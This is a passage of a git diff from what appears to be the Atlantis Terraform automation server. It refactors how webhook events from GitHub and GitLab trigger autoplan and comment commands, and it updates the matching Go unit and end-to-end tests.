+func TestStatus_String(t *testing.T) {
+	cases := map[vcs.CommitStatus]string{
+		vcs.Pending: "pending",
+		vcs.Success: "success",
+		vcs.Failed:  "failed",
+	}
+	for k, v := range cases {
+		Equals(t, v, k.String())
+	}
+}
diff --git a/server/events_controller.go b/server/events_controller.go
index 3db62bd96e..f666e1e329 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -29,7 +29,7 @@ const githubHeader = "X-Github-Event"
 const gitlabHeader = "X-Gitlab-Event"
 
 // EventsController handles all webhook requests which signify 'events' in the
-// VCS host, ex. GitHub. It's split out from Server to make testing easier.
+// VCS host, ex. GitHub.
 type EventsController struct {
 	CommandRunner events.CommandRunner
 	PullCleaner   events.PullCleaner
@@ -51,11 +51,7 @@ type EventsController struct {
 	// startup to support.
 	SupportedVCSHosts []models.VCSHostType
 	VCSClient         vcs.ClientProxy
-	// AtlantisGithubUser is the user that atlantis is running as for Github.
-	AtlantisGithubUser models.User
-	// AtlantisGitlabUser is the user that atlantis is running as for Gitlab.
-	AtlantisGitlabUser models.User
-	TestingMode        bool
+	TestingMode       bool
 }
 
 // Post handles POST webhook requests.
@@ -117,27 +113,20 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event
 		return
 	}
 
-	// We pass in an empty models.Repo for headRepo because we need to do additional
-	// calls to get that information but we need this code path to be generic.
-	// Later on in CommandHandler we detect that this is a GitHub event and
-	// make the necessary calls to get the headRepo.
-	e.handleCommentEvent(w, baseRepo, models.Repo{}, user, pullNum, event.Comment.GetBody(), models.Github)
+	// We pass in nil for maybeHeadRepo because the head repo data isn't
+	// available in the GithubIssueComment event.
+	e.handleCommentEvent(w, baseRepo, nil, user, pullNum, event.Comment.GetBody(), models.Github)
 }
 
 // HandleGithubPullRequestEvent will delete any locks associated with the pull
 // request if the event is a pull request closed event. It's exported to make
 // testing easier.
 func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) {
-	pull, headRepo, err := e.Parser.ParseGithubPull(pullEvent.PullRequest)
+	pull, baseRepo, headRepo, user, err := e.Parser.ParseGithubPullEvent(pullEvent)
 	if err != nil {
 		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID)
 		return
 	}
-	baseRepo, err := e.Parser.ParseGithubRepo(pullEvent.Repo)
-	if err != nil {
-		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID)
-		return
-	}
 	var eventType string
 	switch pullEvent.GetAction() {
 	case "opened":
@@ -150,7 +139,7 @@ func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, p
 		eventType = OtherPullEvent
 	}
 	e.Logger.Info("identified event as type %q", eventType)
-	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType)
+	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType)
 }
 
 const OpenPullEvent = "opened"
@@ -179,16 +168,13 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 		// We use a goroutine so that this function returns and the connection is
 		// closed.
 		fmt.Fprintln(w, "Processing...")
-		// We use a Command to represent autoplanning but we set dir and
-		// workspace to '*' to indicate that all applicable dirs and workspaces
-		// should be planned.
-		autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", "", true)
-		e.Logger.Info("executing command %s", autoplanCmd)
+
+		e.Logger.Info("executing autoplan")
 		if !e.TestingMode {
-			go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
+			go e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user)
 		} else {
 			// When testing we want to wait for everything to complete.
-			e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
+			e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user)
 		}
 		return
 	case ClosedPullEvent:
@@ -202,7 +188,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 		return
 	case OtherPullEvent:
 		// Else we ignore the event.
-		e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event")
+		e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-actionable pull request event")
 		return
 	}
 }
@@ -236,10 +222,10 @@ func (e *EventsController) HandleGitlabCommentEvent(w http.ResponseWriter, event
 		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
 		return
 	}
-	e.handleCommentEvent(w, baseRepo, headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab)
+	e.handleCommentEvent(w, baseRepo, &headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab)
 }
 
-func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) {
+func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) {
 	parseResult := e.CommentParser.Parse(comment, vcsHost)
 	if parseResult.Ignore {
 		truncated := comment
@@ -278,10 +264,10 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 		// Respond with success and then actually execute the command asynchronously.
 		// We use a goroutine so that this function returns and the connection is
 		// closed.
-		go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+		go e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command)
 	} else {
 		// When testing we want to wait for everything to complete.
-		e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+		e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command)
 	}
 }
 
@@ -289,7 +275,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 // request if the event is a merge request closed event. It's exported to make
 // testing easier.
 func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) {
-	pull, baseRepo, headRepo, err := e.Parser.ParseGitlabMergeEvent(event)
+	pull, baseRepo, headRepo, user, err := e.Parser.ParseGitlabMergeEvent(event)
 	if err != nil {
 		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
 		return
@@ -306,7 +292,7 @@ func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter,
 		eventType = OtherPullEvent
 	}
 	e.Logger.Info("identified event as type %q", eventType)
-	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType)
+	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType)
 }
 
 // supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise.
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 7d9f300a72..5abb66ad37 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -164,7 +164,7 @@ func TestGitHubWorkflow(t *testing.T) {
 			When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil)
 
 			// First, send the open pull request event and trigger an autoplan.
-			pullOpenedReq := GitHubPullRequestOpenedEvent(t)
+			pullOpenedReq := GitHubPullRequestOpenedEvent(t, headSHA)
 			ctrl.Post(w, pullOpenedReq)
 			responseContains(t, w, 200, "Processing...")
 			if c.ExpAutoplanCommentFile != "" {
@@ -236,51 +236,51 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 	}
 
 	defaultTFVersion := terraformClient.Version()
-	commandHandler := &events.CommandHandler{
+	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	commandRunner := &events.DefaultCommandRunner{
+		ProjectCommandRunner: &events.ProjectCommandRunner{
+			Locker:           projectLocker,
+			LockURLGenerator: &mockLockURLGenerator{},
+			InitStepRunner: runtime.InitStepRunner{
+				TerraformExecutor: terraformClient,
+				DefaultTFVersion:  defaultTFVersion,
+			},
+			PlanStepRunner: runtime.PlanStepRunner{
+				TerraformExecutor: terraformClient,
+				DefaultTFVersion:  defaultTFVersion,
+			},
+			ApplyStepRunner: runtime.ApplyStepRunner{
+				TerraformExecutor: terraformClient,
+			},
+			RunStepRunner: runtime.RunStepRunner{},
+			PullApprovedChecker: runtime.PullApprovedChecker{
+				VCSClient: e2eVCSClient,
+			},
+			Workspace:               atlantisWorkspace,
+			Webhooks:                &mockWebhookSender{},
+			AtlantisWorkspaceLocker: locker,
+		},
 		EventParser:              eventParser,
 		VCSClient:                e2eVCSClient,
 		GithubPullGetter:         e2eGithubGetter,
 		GitlabMergeRequestGetter: e2eGitlabGetter,
 		CommitStatusUpdater:      e2eStatusUpdater,
-		AtlantisWorkspaceLocker:  events.NewDefaultAtlantisWorkspaceLocker(),
 		MarkdownRenderer:         &events.MarkdownRenderer{},
 		Logger:                   logger,
 		AllowForkPRs:             allowForkPRs,
 		AllowForkPRsFlag:         "allow-fork-prs",
-		PullRequestOperator: &events.DefaultPullRequestOperator{
-			TerraformExecutor: terraformClient,
-			DefaultTFVersion:  defaultTFVersion,
-			ParserValidator:   &yaml.ParserValidator{},
-			ProjectFinder:     &events.DefaultProjectFinder{},
-			VCSClient:         e2eVCSClient,
-			Workspace:         atlantisWorkspace,
-			ProjectOperator: events.ProjectOperator{
-				Locker:           projectLocker,
-				LockURLGenerator: &mockLockURLGenerator{},
-				InitStepOperator: runtime.InitStepOperator{
-					TerraformExecutor: terraformClient,
-					DefaultTFVersion:  defaultTFVersion,
-				},
-				PlanStepOperator: runtime.PlanStepOperator{
-					TerraformExecutor: terraformClient,
-					DefaultTFVersion:  defaultTFVersion,
-				},
-				ApplyStepOperator: runtime.ApplyStepOperator{
-					TerraformExecutor: terraformClient,
-				},
-				RunStepOperator: runtime.RunStepOperator{},
-				ApprovalOperator: runtime.ApprovalOperator{
-					VCSClient: e2eVCSClient,
-				},
-				Workspace: atlantisWorkspace,
-				Webhooks:  &mockWebhookSender{},
-			},
+		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
+			ParserValidator:         &yaml.ParserValidator{},
+			ProjectFinder:           &events.DefaultProjectFinder{},
+			VCSClient:               e2eVCSClient,
+			Workspace:               atlantisWorkspace,
+			AtlantisWorkspaceLocker: locker,
 		},
 	}
 
 	ctrl := server.EventsController{
 		TestingMode:   true,
-		CommandRunner: commandHandler,
+		CommandRunner: commandRunner,
 		PullCleaner: &events.PullClosedExecutor{
 			Locker:    lockingClient,
 			VCSClient: e2eVCSClient,
@@ -298,12 +298,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 		},
 		SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github},
 		VCSClient:         e2eVCSClient,
-		AtlantisGithubUser: models.User{
-			Username: "atlantisbot",
-		},
-		AtlantisGitlabUser: models.User{
-			Username: "atlantisbot",
-		},
 	}
 	return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace
 }
@@ -331,10 +325,12 @@ func GitHubCommentEvent(t *testing.T, comment string) *http.Request {
 	return req
 }
 
-func GitHubPullRequestOpenedEvent(t *testing.T) *http.Request {
+func GitHubPullRequestOpenedEvent(t *testing.T, headSHA string) *http.Request {
 	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json"))
 	Ok(t, err)
-	req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+	// Replace sha with expected sha.
+	requestJSONStr := strings.Replace(string(requestJSON), "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", headSHA, -1)
+	req, err := http.NewRequest("POST", "/events", bytes.NewBuffer([]byte(requestJSONStr)))
 	Ok(t, err)
 	req.Header.Set("Content-Type", "application/json")
 	req.Header.Set(githubHeader, "pull_request")
@@ -357,7 +353,7 @@ func GitHubPullRequestParsed(headSHA string) *github.PullRequest {
 		headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d"
 	}
 	return &github.PullRequest{
-		Number:  github.Int(1),
+		Number:  github.Int(2),
 		State:   github.String("open"),
 		HTMLURL: github.String("htmlurl"),
 		Head: &github.PullRequestBranch{
diff --git a/server/events_controller_test.go b/server/events_controller_test.go
index a7f5c81a69..225021086f 100644
--- a/server/events_controller_test.go
+++ b/server/events_controller_test.go
@@ -16,6 +16,7 @@ package server_test
 import (
 	"bytes"
 	"errors"
+	"fmt"
 	"io/ioutil"
 	"net/http"
 	"net/http/httptest"
@@ -267,9 +268,7 @@ func TestPost_GitlabCommentSuccess(t *testing.T) {
 	e.Post(w, req)
 	responseContains(t, w, http.StatusOK, "Processing...")
 
-	// wait for 200ms so goroutine is called
-	time.Sleep(200 * time.Millisecond)
-	cr.VerifyWasCalledOnce().ExecuteCommand(models.Repo{}, models.Repo{}, models.User{}, 0, nil)
+	cr.VerifyWasCalledOnce().RunCommentCommand(models.Repo{}, &models.Repo{}, models.User{}, 0, nil)
 }
 
 func TestPost_GithubCommentSuccess(t *testing.T) {
@@ -281,16 +280,14 @@ func TestPost_GithubCommentSuccess(t *testing.T) {
 	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
 	baseRepo := models.Repo{}
 	user := models.User{}
-	cmd := events.Command{}
+	cmd := events.CommentCommand{}
 	When(p.ParseGithubIssueCommentEvent(matchers.AnyPtrToGithubIssueCommentEvent())).ThenReturn(baseRepo, user, 1, nil)
 	When(cp.Parse("", models.Github)).ThenReturn(events.CommentParseResult{Command: &cmd})
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusOK, "Processing...")
 
-	// wait for 200ms so goroutine is called
-	time.Sleep(200 * time.Millisecond)
-	cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd)
+	cr.VerifyWasCalledOnce().RunCommentCommand(baseRepo, nil, user, 1, &cmd)
 }
 
 func TestPost_GithubPullRequestInvalid(t *testing.T) {
@@ -301,45 +298,87 @@ func TestPost_GithubPullRequestInvalid(t *testing.T) {
 
 	event := `{"action": "closed"}`
 	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
-	When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, errors.New("err"))
+	When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("err"))
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err")
 }
 
-func TestPost_GithubPullRequestInvalidRepo(t *testing.T) {
-	t.Log("when the event is a github pull request with invalid repo data we return a 400")
-	e, v, _, p, _, _, _, _ := setup(t)
+func TestPost_GitlabMergeRequestInvalid(t *testing.T) {
+	t.Log("when the event is a gitlab merge request with invalid data we return a 400")
+	e, _, gl, p, _, _, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
-	req.Header.Set(githubHeader, "pull_request")
-
-	event := `{"action": "closed"}`
-	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
-	When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil)
-	When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, errors.New("err"))
+	req.Header.Set(gitlabHeader, "value")
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+	repo := models.Repo{}
+	pullRequest := models.PullRequest{State: models.Closed}
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, errors.New("err"))
 	w := httptest.NewRecorder()
 	e.Post(w, req)
-	responseContains(t, w, http.StatusBadRequest, "Error parsing repo data: err")
+	responseContains(t, w, http.StatusBadRequest, "Error parsing webhook: err")
 }
 
 func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) {
 	t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400")
-	e, v, _, p, _, _, _, _ := setup(t)
+	e, v, _, _, _, _, _, _ := setup(t)
 	e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(githubHeader, "pull_request")
 
 	event := `{"action": "closed"}`
 	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
-	When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil)
-	When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, nil)
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
 }
 
-func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
-	t.Log("when the event is a pull request and we have an error calling CleanUpPull we return a 503")
+func TestPost_GitlabMergeRequestNotWhitelisted(t *testing.T) {
+	t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400")
+	e, _, gl, p, _, _, _, _ := setup(t)
+	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+	req.Header.Set(gitlabHeader, "value")
+
+	e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+	repo := models.Repo{}
+	pullRequest := models.PullRequest{State: models.Closed}
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+
+	w := httptest.NewRecorder()
+	e.Post(w, req)
+	responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
+}
+
+func TestPost_GithubPullRequestUnsupportedAction(t *testing.T) {
+	e, v, _, _, _, _, _, _ := setup(t)
+	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+	req.Header.Set(githubHeader, "pull_request")
+
+	event := `{"action": "unsupported"}`
+	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
+	w := httptest.NewRecorder()
+	e.Post(w, req)
+	responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event")
+}
+
+func TestPost_GitlabMergeRequestUnsupportedAction(t *testing.T) {
+	t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400")
+	e, _, gl, p, _, _, _, _ := setup(t)
+	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+	req.Header.Set(gitlabHeader, "value")
+	gitlabMergeEvent.ObjectAttributes.Action = "unsupported"
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+	repo := models.Repo{}
+	pullRequest := models.PullRequest{State: models.Closed}
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+
+	w := httptest.NewRecorder()
+	e.Post(w, req)
+	responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event")
+}
+
+func TestPost_GithubPullRequestClosedErrCleaningPull(t *testing.T) {
+	t.Log("when the event is a closed pull request and we have an error calling CleanUpPull we return a 503")
 	RegisterMockTestingT(t)
 	e, v, _, p, _, c, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
@@ -349,30 +388,30 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
 	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
 	repo := models.Repo{}
 	pull := models.PullRequest{State: models.Closed}
-	When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil)
-	When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil)
+	When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
 	When(c.CleanUpPull(repo, pull)).ThenReturn(errors.New("cleanup err"))
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: cleanup err")
 }
 
-func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) {
-	t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 500")
+func TestPost_GitlabMergeRequestClosedErrCleaningPull(t *testing.T) {
+	t.Log("when the event is a closed gitlab merge request and an error occurs calling CleanUpPull we return a 500")
 	e, _, gl, p, _, c, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
+	gitlabMergeEvent.ObjectAttributes.Action = "close"
 	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
 	repo := models.Repo{}
 	pullRequest := models.PullRequest{State: models.Closed}
-	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil)
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
 	When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err"))
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: err")
 }
 
-func TestPost_GithubPullRequestSuccess(t *testing.T) {
+func TestPost_GithubClosedPullRequestSuccess(t *testing.T) {
 	t.Log("when the event is a pull request and everything works we return a 200")
 	e, v, _, p, _, c, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
@@ -382,8 +421,7 @@ func TestPost_GithubPullRequestSuccess(t *testing.T) {
 	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
 	repo := models.Repo{}
 	pull := models.PullRequest{State: models.Closed}
-	When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil)
-	When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil)
+	When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
 	When(c.CleanUpPull(repo, pull)).ThenReturn(nil)
 	w := httptest.NewRecorder()
 	e.Post(w, req)
@@ -398,12 +436,68 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) {
 	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
 	repo := models.Repo{}
 	pullRequest := models.PullRequest{State: models.Closed}
-	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil)
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusOK, "Pull request cleaned successfully")
 }
 
+func TestPost_PullOpenedOrUpdated(t *testing.T) {
+	cases := []struct {
+		Description string
+		HostType    models.VCSHostType
+		Action      string
+	}{
+		{
+			"github opened",
+			models.Github,
+			"opened",
+		},
+		{
+			"gitlab opened",
+			models.Gitlab,
+			"open",
+		},
+		{
+			"github synchronized",
+			models.Github,
+			"synchronize",
+		},
+		{
+			"gitlab update",
+			models.Gitlab,
+			"update",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.Description, func(t *testing.T) {
+			e, v, gl, p, cr, _, _, _ := setup(t)
+			req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+			switch c.HostType {
+			case models.Gitlab:
+				req.Header.Set(gitlabHeader, "value")
+				gitlabMergeEvent.ObjectAttributes.Action = c.Action
+				When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+				repo := models.Repo{}
+				pullRequest := models.PullRequest{State: models.Closed}
+				When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+			case models.Github:
+				req.Header.Set(githubHeader, "pull_request")
+				event := fmt.Sprintf(`{"action": "%s"}`, c.Action)
+				When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
+				repo := models.Repo{}
+				pull := models.PullRequest{State: models.Closed}
+				When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
+			}
+			w := httptest.NewRecorder()
+			e.Post(w, req)
+			responseContains(t, w, http.StatusOK, "Processing...")
+			cr.VerifyWasCalledOnce().RunAutoplanCommand(models.Repo{}, models.Repo{}, models.PullRequest{State: models.Closed}, models.User{})
+		})
+	}
+}
+
 func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
 	RegisterMockTestingT(t)
 	v := mocks.NewMockGithubRequestValidator()
@@ -414,6 +508,7 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid
 	c := emocks.NewMockPullCleaner()
 	vcsmock := vcsmocks.NewMockClientProxy()
 	e := server.EventsController{
+		TestingMode:                  true,
 		Logger:                       logging.NewNoopLogger(),
 		GithubRequestValidator:       v,
 		Parser:                       p,
diff --git a/server/router_test.go b/server/router_test.go
new file mode 100644
index 0000000000..91bf9f3fc9
--- /dev/null
+++ b/server/router_test.go
@@ -0,0 +1,27 @@
+package server_test
+
+import (
+	"net/http"
+	"testing"
+
+	"github.com/gorilla/mux"
+	"github.com/runatlantis/atlantis/server"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRouter_GenerateLockURL(t *testing.T) {
+	queryParam := "queryparam"
+	routeName := "routename"
+	atlantisURL := "https://example.com"
+
+	underlyingRouter := mux.NewRouter()
+	underlyingRouter.HandleFunc("/lock", func(_ http.ResponseWriter, _ *http.Request) {}).Methods("GET").Queries(queryParam, "{queryparam}").Name(routeName)
+
+	router := &server.Router{
+		AtlantisURL:               atlantisURL,
+		LockViewRouteIDQueryParam: queryParam,
+		LockViewRouteName:         routeName,
+		Underlying:                underlyingRouter,
+	}
+	Equals(t, "https://example.com/lock?queryparam=myid", router.GenerateLockURL("myid"))
+}
diff --git a/server/server.go b/server/server.go
index fe97620d53..1980ba2521 100644
--- a/server/server.go
+++ b/server/server.go
@@ -63,7 +63,7 @@ type Server struct {
 	AtlantisVersion    string
 	Router             *mux.Router
 	Port               int
-	CommandHandler     *events.CommandHandler
+	CommandRunner      *events.DefaultCommandRunner
 	Logger             *logging.SimpleLogger
 	Locker             locking.Locker
 	AtlantisURL        string
@@ -221,45 +221,43 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		GitlabToken: userConfig.GitlabToken,
 	}
 	defaultTfVersion := terraformClient.Version()
-	commandHandler := &events.CommandHandler{
-		EventParser:              eventParser,
+	commandRunner := &events.DefaultCommandRunner{
 		VCSClient:                vcsClient,
 		GithubPullGetter:         githubClient,
 		GitlabMergeRequestGetter: gitlabClient,
 		CommitStatusUpdater:      commitStatusUpdater,
-		AtlantisWorkspaceLocker:  workspaceLocker,
+		EventParser:              eventParser,
 		MarkdownRenderer:         markdownRenderer,
 		Logger:                   logger,
 		AllowForkPRs:             userConfig.AllowForkPRs,
 		AllowForkPRsFlag:         config.AllowForkPRsFlag,
-		PullRequestOperator: &events.DefaultPullRequestOperator{
-			TerraformExecutor: terraformClient,
-			DefaultTFVersion:  defaultTfVersion,
-			ParserValidator:   &yaml.ParserValidator{},
-			ProjectFinder:     &events.DefaultProjectFinder{},
-			VCSClient:         vcsClient,
-			Workspace:         workspace,
-			ProjectOperator: events.ProjectOperator{
-				Locker:           projectLocker,
-				LockURLGenerator: router,
-				InitStepOperator: runtime.InitStepOperator{
-					TerraformExecutor: terraformClient,
-					DefaultTFVersion:  defaultTfVersion,
-				},
-				PlanStepOperator: runtime.PlanStepOperator{
-					TerraformExecutor: terraformClient,
-					DefaultTFVersion:  defaultTfVersion,
-				},
-				ApplyStepOperator: runtime.ApplyStepOperator{
-					TerraformExecutor: terraformClient,
-				},
-				RunStepOperator: runtime.RunStepOperator{},
-				ApprovalOperator: runtime.ApprovalOperator{
-					VCSClient: vcsClient,
-				},
-				Workspace: workspace,
-				Webhooks:  webhooksManager,
+		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
+			ParserValidator: &yaml.ParserValidator{},
+			ProjectFinder:   &events.DefaultProjectFinder{},
+			VCSClient:       vcsClient,
+			Workspace:       workspace,
+		},
+		ProjectCommandRunner: &events.ProjectCommandRunner{
+			Locker:           projectLocker,
+			LockURLGenerator: router,
+			InitStepRunner: runtime.InitStepRunner{
+				TerraformExecutor: terraformClient,
+				DefaultTFVersion:  defaultTfVersion,
+			},
+			PlanStepRunner: runtime.PlanStepRunner{
+				TerraformExecutor: terraformClient,
+				DefaultTFVersion:  defaultTfVersion,
+			},
+			ApplyStepRunner: runtime.ApplyStepRunner{
+				TerraformExecutor: terraformClient,
+			},
+			RunStepRunner: runtime.RunStepRunner{},
+			PullApprovedChecker: runtime.PullApprovedChecker{
+				VCSClient: vcsClient,
 			},
+			Workspace:               workspace,
+			Webhooks:                webhooksManager,
+			AtlantisWorkspaceLocker: workspaceLocker,
 		},
 	}
 	repoWhitelist := &events.RepoWhitelistChecker{
@@ -273,7 +271,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		LockDetailTemplate: lockTemplate,
 	}
 	eventsController := &EventsController{
-		CommandRunner:                commandHandler,
